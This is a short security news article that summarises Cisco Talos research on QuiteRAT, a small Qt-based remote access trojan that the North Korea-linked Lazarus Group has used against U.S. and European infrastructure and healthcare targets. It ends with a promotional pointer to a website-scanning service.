The Lazarus Group, a hacking collective linked to the North Korean government, has been spotted targeting internet backbone infrastructure and healthcare organizations in the U.S. and Europe. Researchers at Cisco’s Talos security team have identified new malware deployed by the group, dubbed QuiteRAT. The hackers exploit a known vulnerability in ManageEngine ServiceDesk to gain initial access to systems. Once inside, they use the Java runtime process to download and execute a binary, leading to the deployment of QuiteRAT.
What sets QuiteRAT apart is its small file size and the programming framework it’s written in—Qt. It is significantly smaller (around 5 MB) compared to Lazarus Group’s previous malware, MagicRAT (18 MB), making it harder to detect. QuiteRAT can execute arbitrary commands on an infected machine, record basic details like MAC and IP addresses, and remain dormant for extended periods before reactivation.
Cisco’s Talos team believes QuiteRAT is an evolved form of MagicRAT, which was last updated in April 2022. Both malwares share similarities, including the ability to run arbitrary commands and use base64 encoding to obfuscate their strings. They also have similar functionality allowing them to remain dormant for specified periods.
The Lazarus Group has been active since at least 2009 and is known for espionage and cryptocurrency theft. The emergence of QuiteRAT indicates a continued evolution in the group’s cyber capabilities, raising concerns about its potential impact on critical infrastructure and healthcare systems. As the malware was first observed in May 2023, it marks a new chapter in the Lazarus Group’s cyber activities, warranting heightened vigilance from cybersecurity experts and organizations alike.
Source: Cyber Security Connect
To mitigate potential threats, it is important to implement additional cybersecurity measures with the help of a trusted partner like INFRA www.infrascan.net or you can try your self using check.website.